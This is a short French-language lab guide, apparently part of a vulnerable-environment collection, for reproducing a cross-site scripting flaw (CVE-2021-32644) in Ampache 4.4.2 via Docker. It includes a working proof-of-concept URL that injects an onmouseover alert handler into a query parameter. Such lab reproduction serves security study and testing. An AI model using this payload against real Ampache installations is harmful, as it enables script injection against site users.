
XSS dans Ampache
Cette vulnérabilité est une XSS affectant les versions d'Ampache antérieures à 4.4.3. https://nvd.nist.gov/vuln/detail/CVE-2021-32644
Lors de l'installation, veuillez configurer le port forwarding dans le fichier docker-compose.yml. La version actuelle d'Ampache installée est la 4.4.2.
$docker-compose up
Allez sur http://[ip du serveur web]:port/
Allez sur http://[ip du serveur web]:port/
Configurez la base de données MySQL comme indiqué dans l'image ci-dessous.

En insérant le PoC ci-dessous, vous pouvez observer la vulnérabilité XSS.
http://[ip]:port/random.php?action=get_advanced&type=%27%22%20onmouseover%3dalert(0x0002DE)%20

https://packetstormsecurity.com/files/163620/Ampache-4.4.2-Cross-Site-Scripting.html